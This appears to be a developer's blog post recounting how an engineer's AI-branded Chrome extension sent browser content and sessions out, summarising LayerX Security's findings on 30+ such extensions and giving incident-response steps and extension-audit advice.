Two weeks ago, one of my engineers mentioned he’d installed a Chrome extension called “AI Assistant Pro” to help summarize long GitHub PRs. Sounded reasonable — we all use AI tools constantly, and browser extensions feel like a natural fit. The reviews were decent, it had about 40,000 installs.
Then our security team flagged unusual outbound requests from his machine during a routine audit.
The extension was quietly exfiltrating his browser content — including the GitHub session he was logged into, his email content when Gmail was open, and any API keys visible in browser tabs. It was one of 30+ carbon-copy malicious extensions that LayerX Security recently uncovered in the Chrome Web Store, all disguised as AI assistants.
How These Extensions Actually Work
The attack is embarrassingly simple, which is what makes it effective. According to LayerX’s research, all 30+ extensions share nearly identical codebases with superficial branding differences. Here’s the pattern:
They look legitimate. Clean landing pages, decent review counts (likely botted), names like “AI Page Assistant” or “Smart AI Helper.” Nothing screams scam at first glance.
They request broad permissions. “Read and change all your data on all websites” — which, to be fair, many legitimate extensions also request. Developers are desensitized to this prompt.
They actually provide basic AI functionality. Some of them wrap a free API (or just iframe a chatbot) so the user thinks it’s working. This is the clever part — if it “works,” you don’t question it.
They silently inject iframes. Behind the scenes, the extension loads hidden iframes that scrape page content — email bodies, code repositories, API dashboards, anything visible in your browser.
They exfiltrate to attacker-controlled servers. The scraped data gets sent to external endpoints, typically disguised as analytics or telemetry calls.
The specific extensions LayerX found had collectively been installed by over 260,000 users. That’s 260,000 people whose browser sessions were potentially compromised.
Why Developers Are the Perfect Target
I used to think phishing attacks targeting developers would be obvious. We’re technical, we know about security, we should notice something weird. But these attacks exploit a specific blind spot:
Developers trust developer tools implicitly. We install CLI tools, VS Code extensions, npm packages, and browser extensions with barely a glance at the permissions. We’re conditioned to accept broad access requests because legitimate tools need them too. A code review extension does need to read your GitHub pages. An AI summarizer does need to read page content.
The attack surface for developers is enormous:
- GitHub/GitLab sessions with access to private repos
- Cloud provider consoles (AWS, GCP) with visible API keys
- CI/CD dashboards with deployment credentials
- Email containing password reset links and 2FA codes
- Slack/Teams with internal conversations
My engineer had his GitHub session, two cloud consoles, and Gmail open simultaneously. All of it was accessible to the malicious extension.
What We Did After Finding It
Here’s the incident response timeline (roughly 4 hours total):
Hour 1: Confirm and contain. Removed the extension, revoked the engineer’s GitHub tokens, rotated any API keys that had been visible in browser tabs. This was the panicky part.
Hour 2: Assess blast radius. Checked browser history to identify which sensitive pages were open during the period the extension was installed (about 11 days). Cross-referenced with the extension’s known exfiltration endpoints.
Hour 3: Rotate credentials. Rotated every credential that could have been visible — GitHub PATs, AWS access keys, a Vercel token, and his Google session. Changed passwords on anything accessed during those 11 days.
Hour 4: Team audit. Had every engineer on the team export their Chrome extension list. Found two more people with suspicious AI-branded extensions (different names, same pattern). Removed those too.
Total cost: about 16 person-hours of engineering time, plus the paranoia tax of not knowing exactly what was captured.
The 10-Minute Extension Audit You Should Do Right Now
Seriously, stop reading and do this:
- Open
chrome://extensions/in your browser - For each extension, check:
- Do you actually use it regularly? Remove anything you forgot you installed
- When was it last updated? Abandoned extensions can be sold to malicious actors
- What permissions does it have? Click “Details” → look at “Site access”
- Is “Read and change all your data on all websites” really necessary?
- Search each extension name + “malware” or “security” — takes 30 seconds
- Check the developer/publisher — legitimate extensions are usually from known companies or developers with a track record
For AI-specific extensions, be extra skeptical of:
- Extensions with generic names (“AI Assistant,” “Smart AI Helper”)
- Extensions from unknown publishers with suspiciously high install counts
- Extensions that claim to work with multiple AI providers but don’t specify which APIs they use
- Extensions that request permissions beyond what their stated function requires
What I Changed on My Team
After this incident, I implemented three rules:
Rule 1: Extension allowlist. We now maintain a list of approved browser extensions. Want to install something new? Add it to a shared doc, someone else reviews it first. Yes, this is annoying. It’s also the only reliable control.
Rule 2: Separate browser profiles. Sensitive work (cloud consoles, production dashboards) happens in a browser profile with zero extensions. Everything else can happen in the regular profile. This limits the blast radius of any compromised extension.
Rule 3: Monthly audit. Once a month, everyone exports their extension list. Takes 5 minutes. We diff it against the previous month to catch new installs.
These aren’t revolutionary ideas. They’re the browser equivalent of not running random npm packages as root — basic hygiene that most teams skip because it feels tedious.
Why This Will Get Worse Before It Gets Better
Here’s what bugs me most: the AI hype cycle has created a perfect storm for this kind of attack. Everyone wants AI tools. New ones launch daily. The Chrome Web Store’s review process can’t keep up. And developers — the people who should know better — are installing unvetted extensions because the productivity promise is too tempting.
We’ve written before about AI tool risks from a workflow perspective. But the security angle is harder to manage because the threat isn’t the AI tool doing something wrong — it’s the AI tool being a disguise for something malicious.
The same pattern exists in VS Code extensions, npm packages, and MCP servers. Anywhere developers install third-party code with broad access, attackers will follow. The MCP ecosystem fragmentation we covered recently makes this worse — more protocols, more integration points, more attack surface.
What to Watch For Next
LayerX found 30 extensions, but that’s almost certainly a fraction of the total. The economics are too good for attackers — build one scraper, reskin it 30 times, collect credentials from a quarter-million developers. Expect this pattern to accelerate through 2026.
Google has started removing flagged extensions, but the Chrome Web Store’s reactive approach means malicious extensions often stay live for weeks or months before being caught. Don’t rely on Google to protect you.
The bottom line: Audit your extensions today. Set up a separate browser profile for sensitive work. And the next time an AI Chrome extension promises to “boost your productivity” — assume it’s lying until proven otherwise.